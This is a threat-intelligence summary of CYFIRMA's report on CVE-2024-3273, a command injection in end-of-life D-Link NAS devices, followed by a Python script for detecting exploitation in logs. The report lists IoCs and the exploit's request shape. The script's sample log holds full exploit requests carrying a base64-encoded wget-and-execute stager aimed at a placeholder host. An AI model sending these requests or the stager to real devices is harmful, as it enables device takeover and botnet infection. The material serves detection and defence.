Threat Actors Actively Exploiting CVE-2024-3273 : Underground Forums Share IP Addresses of Vulnerable D-Link NAS Devices – CYFIRMA

CVE-2024-3273 is a critical command-injection vulnerability in end-of-life D-Link NAS devices that gives a remote attacker command execution on the device, and with it the ability to steal data or take the device over outright. Active exploitation is being discussed on underground forums, with threat actors linked to Russia and China, including Camaro Dragon (Mustang Panda) and Volt Typhoon, and Mirai-based activity has been observed against vulnerable devices. #CVE-2024-3273 #D-LinkNAS #MustangPanda #VoltTyphoon #Mirai #DNS-320L

Keypoints

  • CVE-2024-3273 is a critical vulnerability affecting end-of-life D-Link NAS devices, with a CVSS base score of 9.8 and the potential for unauthorized access, data theft, or DoS.
  • Threat actors on underground forums are actively discussing the flaw and sharing IP addresses of affected devices, indicating active exploitation activity.
  • CYFIRMA identified 90,446 publicly accessible D-Link NAS instances, with 54,845 unique IPs potentially vulnerable to this flaw.
  • The exploit targets the CGI binaries nas_sharing.cgi and orospucoc.cgi, logging in as the pre-configured system user messagebus, which has no password (the hard-coded account is tracked separately as CVE-2024-3272).
  • Payloads are delivered in HTTP GET requests: the command is base64-encoded and placed in the system parameter, which the CGI decodes and hands to a shell, so arbitrary commands run on the device without any valid credential.
  • Mirai malware has been observed in attacks against vulnerable D-Link NAS devices, and there is discussion about selling PoCs and TTPs on the Deep/Dark Web.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The vulnerability can be exploited remotely through CGI interfaces to take control of the device. ‘CVE-2024-3273 allows remote attackers to take control of end-of-life (EOL) network-attached storage (NAS) devices’
  • [T1068] Exploitation for Privilege Escalation – The flaw lets attackers gain root privileges on vulnerable devices. ‘The vulnerability allows remote attackers to take control of affected devices due to hardcoded, password-less credentials’
  • [T1078] Valid Accounts – Attackers leverage a pre-configured system user with no password to access the device. ‘a pre-configured system user named messagebus, which has no password’
  • [T1059] Command and Scripting Interpreter – Exploitation occurs by executing commands via CGI and system parameters. ‘execute arbitrary commands on the system’
  • [T1027] Obfuscated/Compressed Files and Information – Payloads are base64-encoded in HTTP requests to conceal commands. ‘payload is base64 encoded and injected into the URL’

Indicators of Compromise

  • [IP Address] – Malicious IPs observed targeting D-Link NAS vulnerabilities: 195.1.144.109, 80.94.92.60, 45.142.182.70
  • [URL/Endpoint] – Exploit CGI endpoints used in attacks: /cgi-bin/nas_sharing.cgi, /cgi-bin/orospucoc.cgi, and /.most/orospucoc.cgi
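The request shape described in the Keypoints (messagebus with an empty password, a base64 command in the system parameter) and the endpoints and IPs listed above translate directly into a log-hunting rule. The script below is an added example, not code from the CYFIRMA report: it parses combined-format (Apache/nginx style) access-log lines, flags requests to the three IoC endpoints, marks hits from the reported IPs, and decodes the system parameter so the injected command is readable. The log lines are constructed for the example; 198.51.100.7 and 203.0.113.9 are documentation/TEST-NET placeholders, not real attacker infrastructure.

```python
"""Flag CVE-2024-3273 exploitation attempts in web-server access logs.

Added example (not CYFIRMA's code). Parses combined-format access-log lines,
matches requests against the CGI endpoints and source IPs listed in the report,
checks for the password-less messagebus login, and base64-decodes the `system`
parameter so the injected command can be read. Log lines are constructed here;
198.51.100.7 and 203.0.113.9 are TEST-NET placeholders, not real hosts.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

# Endpoints and source IPs taken from the report's IoC section.
EXPLOIT_ENDPOINTS = {
    "/cgi-bin/nas_sharing.cgi",
    "/cgi-bin/orospucoc.cgi",
    "/.most/orospucoc.cgi",
}
IOC_IPS = {"195.1.144.109", "80.94.92.60", "45.142.182.70"}

# Combined Log Format: ip ident user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def decode_system_param(value):
    """Return the decoded `system` payload, or None if it is not valid base64.

    Attackers often send the base64 unescaped; the '+' of the standard alphabet
    is then turned into a space by query-string parsing, so put it back first.
    """
    repaired = value.replace(" ", "+")
    try:
        raw = base64.b64decode(repaired, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def analyse_line(line):
    """Return a finding dict for a request to an exploit endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path not in EXPLOIT_ENDPOINTS:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    user = qs.get("user", [None])[0]
    passwd = qs.get("passwd", [None])[0]
    system = qs.get("system", [None])[0]
    return {
        "src_ip": m.group("ip"),
        "known_ioc_ip": m.group("ip") in IOC_IPS,
        "path": parts.path,
        "messagebus_no_password": user == "messagebus" and passwd == "",
        "decoded_command": decode_system_param(system) if system is not None else None,
        "status": int(m.group("status")),
    }


def scan(lines):
    """Run analyse_line over every log line and keep the hits."""
    return [f for f in map(analyse_line, lines) if f is not None]


# --- Constructed sample log (not captured traffic) -------------------------
# A Mirai-style stager, base64-encoded the way the exploit expects.
STAGER = "cd /tmp; wget http://198.51.100.7/m.arm -O m; chmod +x m; ./m"
STAGER_B64 = base64.b64encode(STAGER.encode()).decode()

SAMPLE_LOG = [
    # benign traffic
    '10.0.0.5 - - [08/Apr/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    # exploit from a reported IoC IP, payload percent-encoded
    '195.1.144.109 - - [08/Apr/2024:10:00:02 +0000] "GET /cgi-bin/nas_sharing.cgi'
    f'?user=messagebus&passwd=&system={quote(STAGER_B64, safe="")} HTTP/1.1" 200 512 "-" "curl/8.0"',
    # exploit from an unlisted IP; raw base64 of "id>/tmp/x", which contains a '+'
    '203.0.113.9 - - [08/Apr/2024:10:00:03 +0000] "GET /.most/orospucoc.cgi'
    '?user=messagebus&passwd=&system=aWQ+L3RtcC94 HTTP/1.1" 404 153 "-" "python-requests/2.31"',
    # probe of the vulnerable CGI without a payload
    '203.0.113.9 - - [08/Apr/2024:10:00:04 +0000] "GET /cgi-bin/nas_sharing.cgi HTTP/1.1" 401 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any hit on these paths from the internet is worth a look regardless of the HTTP status: a 404 from a patched or unaffected host still shows the source is sweeping for the flaw, and the decoded command tells you whether it was a probe or a real dropper. The IP list is a starting point only; the report notes the shared IP lists circulate on forums, so expect exploitation from many more sources than the three listed.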

Read more: https://www.cyfirma.com/research/threat-actors-actively-exploiting-cve-2024-3273-underground-forums-share-ip-addresses-of-vulnerable-d-link-nas-devices/